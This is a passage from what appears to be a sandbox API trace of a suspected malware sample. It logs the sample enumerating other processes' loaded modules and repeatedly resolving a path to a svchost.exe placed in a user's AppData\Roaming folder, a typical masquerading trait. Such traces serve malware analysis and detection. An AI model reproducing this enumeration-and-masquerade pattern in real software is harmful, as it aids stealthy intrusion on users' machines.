(pv=0xd914b0) [0063.501] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.501] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0063.502] CoTaskMemFree (pv=0xd914b0) [0063.502] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x23f9d60, cb=0x18 | out: lpmodinfo=0x23f9d60*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0063.503] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.503] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0063.504] CoTaskMemFree (pv=0xd914b0) [0063.504] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.505] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0063.506] CoTaskMemFree (pv=0xd914b0) [0063.506] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x23fbfe0, cb=0x18 | out: lpmodinfo=0x23fbfe0*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0063.507] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.507] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0063.508] CoTaskMemFree (pv=0xd914b0) [0063.508] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.508] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0063.509] CoTaskMemFree (pv=0xd914b0) [0063.509] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x23fe190, cb=0x18 | out: lpmodinfo=0x23fe190*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0063.510] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.510] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0063.511] CoTaskMemFree (pv=0xd914b0) [0063.511] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.511] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0063.513] CoTaskMemFree (pv=0xd914b0) [0063.513] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x2400350, cb=0x18 | out: lpmodinfo=0x2400350*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0063.514] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.514] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0063.516] CoTaskMemFree (pv=0xd914b0) [0063.516] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.516] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0063.518] CoTaskMemFree (pv=0xd914b0) [0063.518] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd790000, lpmodinfo=0x2402510, cb=0x18 | out: lpmodinfo=0x2402510*(lpBaseOfDll=0x7fefd790000, SizeOfImage=0xc000, EntryPoint=0x7fefd793e50)) returned 1 [0063.519] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.520] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd790000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="sxssrv.DLL") returned 0xa [0063.521] CoTaskMemFree (pv=0xd914b0) [0063.521] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.521] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd790000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sxssrv.DLL" (normalized: "c:\\windows\\system32\\sxssrv.dll")) returned 0x1e [0063.522] CoTaskMemFree (pv=0xd914b0) [0063.522] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd680000, lpmodinfo=0x24046d0, cb=0x18 | out: lpmodinfo=0x24046d0*(lpBaseOfDll=0x7fefd680000, SizeOfImage=0x91000, EntryPoint=0x7fefd681440)) returned 1 [0063.523] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.524] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd680000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="sxs.dll") returned 0x7 [0063.525] CoTaskMemFree (pv=0xd914b0) [0063.525] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.525] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd680000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")) returned 0x1b [0063.527] CoTaskMemFree (pv=0xd914b0) [0063.527] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x2406880, cb=0x18 | out: lpmodinfo=0x2406880*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0063.528] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.528] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0063.529] CoTaskMemFree (pv=0xd914b0) [0063.529] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.529] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0063.531] CoTaskMemFree (pv=0xd914b0) [0063.531] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x2408a40, cb=0x18 | out: lpmodinfo=0x2408a40*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0063.532] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.532] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0063.534] CoTaskMemFree (pv=0xd914b0) [0063.534] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.534] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0063.535] CoTaskMemFree (pv=0xd914b0) [0063.535] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x240ac10, cb=0x18 | out: lpmodinfo=0x240ac10*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0063.537] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.537] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0063.538] CoTaskMemFree (pv=0xd914b0) [0063.538] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.538] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0063.540] CoTaskMemFree (pv=0xd914b0) [0063.540] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x240cef8, cb=0x18 | out: lpmodinfo=0x240cef8*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0063.542] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.542] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd914b0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0063.543] CoTaskMemFree (pv=0xd914b0) [0063.544] CoTaskMemAlloc (cb=0x804) returned 0xd914b0 [0063.544] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd914b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0063.545] CoTaskMemFree (pv=0xd914b0) [0063.545] CloseHandle (hObject=0x214) returned 1 [0063.549] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0063.549] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x214 [0063.549] EnumProcessModules (in: hProcess=0x214, lphModule=0x240fa28, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x240fa28, lpcbNeeded=0x23ee40) returned 1 [0063.550] GetModuleInformation (in: hProcess=0x214, hModule=0x320000, lpmodinfo=0x240fc98, cb=0x18 | out: lpmodinfo=0x240fc98*(lpBaseOfDll=0x320000, SizeOfImage=0x17000, EntryPoint=0x3214a1)) returned 1 [0063.551] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.551] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x320000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="mother.exe") returned 0xa [0063.551] CoTaskMemFree (pv=0xd91940) [0063.551] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.551] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x320000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\mother.exe" (normalized: "c:\\program files\\windows portable devices\\mother.exe")) returned 0x34 [0063.552] CoTaskMemFree (pv=0xd91940) [0063.552] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2411ec0, cb=0x18 | out: lpmodinfo=0x2411ec0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0063.553] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.553] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0063.554] CoTaskMemFree (pv=0xd91940) [0063.554] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.554] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0063.554] CoTaskMemFree (pv=0xd91940) [0063.554] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2414098, cb=0x18 | out: lpmodinfo=0x2414098*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0063.555] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.555] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0063.555] CoTaskMemFree (pv=0xd91940) [0063.555] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.555] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0063.556] CoTaskMemFree (pv=0xd91940) [0063.556] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x2416258, cb=0x18 | out: lpmodinfo=0x2416258*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0063.557] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.557] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0063.561] CoTaskMemFree (pv=0xd91940) [0063.561] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.561] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0063.562] CoTaskMemFree (pv=0xd91940) [0063.562] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2418428, cb=0x18 | out: lpmodinfo=0x2418428*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0063.563] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.563] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0063.564] CoTaskMemFree (pv=0xd91940) [0063.564] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.564] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0063.565] CoTaskMemFree (pv=0xd91940) [0063.565] CloseHandle (hObject=0x214) returned 1 [0063.566] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0063.566] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb80) returned 0x214 [0063.566] EnumProcessModules (in: hProcess=0x214, lphModule=0x241ab48, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x241ab48, lpcbNeeded=0x23ee40) returned 1 [0063.567] GetModuleInformation (in: hProcess=0x214, hModule=0x1290000, lpmodinfo=0x241adb8, cb=0x18 | out: lpmodinfo=0x241adb8*(lpBaseOfDll=0x1290000, SizeOfImage=0x17000, EntryPoint=0x12914a1)) returned 1 [0063.567] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.567] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x1290000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="leechftp.exe") returned 0xc [0063.568] CoTaskMemFree (pv=0xd91940) [0063.568] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.568] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x1290000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\leechftp.exe" (normalized: "c:\\program files (x86)\\windows mail\\leechftp.exe")) returned 0x30 [0063.569] CoTaskMemFree (pv=0xd91940) [0063.569] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x241cfe0, cb=0x18 | out: lpmodinfo=0x241cfe0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0063.569] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.569] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0063.570] CoTaskMemFree (pv=0xd91940) [0063.570] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.570] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0063.570] CoTaskMemFree (pv=0xd91940) [0063.571] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x241f1a0, cb=0x18 | out: lpmodinfo=0x241f1a0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0063.571] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.571] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0063.572] CoTaskMemFree (pv=0xd91940) [0063.572] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.572] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0063.572] CoTaskMemFree (pv=0xd91940) [0063.572] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x2421360, cb=0x18 | out: lpmodinfo=0x2421360*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0063.574] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.574] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0063.575] CoTaskMemFree (pv=0xd91940) [0063.575] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.575] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0063.576] CoTaskMemFree (pv=0xd91940) [0063.576] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2423530, cb=0x18 | out: lpmodinfo=0x2423530*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0063.577] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.577] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0063.578] CoTaskMemFree (pv=0xd91940) [0063.578] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.578] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0063.578] CoTaskMemFree (pv=0xd91940) [0063.578] CloseHandle (hObject=0x214) returned 1 [0063.580] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0063.580] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x490) returned 0x214 [0063.580] EnumProcessModules (in: hProcess=0x214, lphModule=0x2425c50, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2425c50, lpcbNeeded=0x23ee40) returned 1 [0063.583] GetModuleInformation (in: hProcess=0x214, hModule=0xff130000, lpmodinfo=0x2425ec0, cb=0x18 | out: lpmodinfo=0x2425ec0*(lpBaseOfDll=0xff130000, SizeOfImage=0x14000, EntryPoint=0xff132ce0)) returned 1 [0063.584] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.584] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff130000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="taskhost.exe") returned 0xc [0063.584] CoTaskMemFree (pv=0xd91940) [0063.584] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.584] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff130000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe")) returned 0x20 [0063.585] CoTaskMemFree (pv=0xd91940) [0063.585] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24280e0, cb=0x18 | out: lpmodinfo=0x24280e0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0063.585] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.585] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0063.586] CoTaskMemFree (pv=0xd91940) [0063.586] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.586] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0063.587] CoTaskMemFree (pv=0xd91940) [0063.587] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x242a2a0, cb=0x18 | out: lpmodinfo=0x242a2a0*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0063.587] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.587] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0063.588] CoTaskMemFree (pv=0xd91940) [0063.588] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.588] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0063.589] CoTaskMemFree (pv=0xd91940) [0063.589] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x242c470, cb=0x18 | out: lpmodinfo=0x242c470*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0063.589] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.589] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0063.590] CoTaskMemFree (pv=0xd91940) [0063.590] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.590] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0063.591] CoTaskMemFree (pv=0xd91940) [0063.591] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x242e640, cb=0x18 | out: lpmodinfo=0x242e640*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0063.591] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.591] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0063.592] CoTaskMemFree (pv=0xd91940) [0063.592] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.592] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0063.593] CoTaskMemFree (pv=0xd91940) [0063.593] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x2430858, cb=0x18 | out: lpmodinfo=0x2430858*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0063.594] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.594] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0063.595] CoTaskMemFree (pv=0xd91940) [0063.595] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.595] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0063.596] CoTaskMemFree (pv=0xd91940) [0063.596] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x2432a18, cb=0x18 | out: lpmodinfo=0x2432a18*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0063.597] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.597] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0063.598] CoTaskMemFree (pv=0xd91940) [0063.598] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.598] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0063.599] CoTaskMemFree (pv=0xd91940) [0063.599] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x2434bd8, cb=0x18 | out: lpmodinfo=0x2434bd8*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0063.600] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.600] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0063.601] CoTaskMemFree (pv=0xd91940) [0063.601] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.601] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0063.602] CoTaskMemFree (pv=0xd91940) [0063.602] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x2436d98, cb=0x18 | out: lpmodinfo=0x2436d98*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0063.603] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.603] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0063.626] CoTaskMemFree (pv=0xd91940) [0063.627] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.627] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0063.628] CoTaskMemFree (pv=0xd91940) [0063.628] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x2438fe0, cb=0x18 | out: lpmodinfo=0x2438fe0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0063.629] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.629] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0063.630] CoTaskMemFree (pv=0xd91940) [0063.630] CoTaskMemAlloc (cb=0x804) returned 0xd91940 